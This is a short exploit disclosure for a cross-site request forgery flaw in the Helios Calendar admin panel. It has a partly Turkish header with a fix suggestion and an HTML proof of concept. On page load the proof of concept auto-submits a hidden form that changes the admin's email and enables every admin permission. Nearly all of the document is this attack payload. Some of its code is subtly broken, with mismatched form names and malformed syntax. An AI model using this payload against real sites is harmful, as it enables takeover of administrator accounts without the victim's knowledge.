< ------------------- header data start ------------------- >

#############################################################

# Application Name : Helios Calendar

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form name=frm id=frm method=post action=http://www.site.com/admin/components/AdminEditAction.php

onsubmit=return chkFrm();>
<input type=hidden name=uID id=uID value=0 />
<input type=hidden name=oldEmail id=oldEmail value= />
<input name=hidden id=firstname type=hidden size=20 maxlength=50 value=addadd />
<input name=hidden id=lastname type=hidden size=20 maxlength=50 value=adddadd />
<input name=hidden id=email type=hidden size=30 maxlength=100 value=sifrenizingelecegimail />

<input type=hidden name=editEvent id=editEventAllow value=1 class=noBorderIE />
<input type=hidden name=eventPending id=eventPendingAllow value=1 class=noBorderIE />
<input type=hidden name=eventCategory id=eventCategoryAllow value=1 class=noBorderIE />
<input type=hidden name=editLoc id=locEditAllow value=1 class=noBorderIE />
<input type=hidden name=userEdit id=userEditAllow value=1 class=noBorderIE />
<input type=hidden name=adminEdit id=adminEditAllow value=1 class=noBorderIE />
<input type=hidden name=newsletter id=newsletterAllow value=1 class=noBorderIE />
<input type=hidden name=settings id=settingsAllow value=1 class=noBorderIE />
<input type=hidden name=tools id=toolsAllow value=1 class=noBorderIE />
<input type=hidden name=reports id=reportsAllow value=1 class=noBorderIE />


<input type=submit name=submit id=submit value= Save Admin class=button />

< -- bug code end of -- >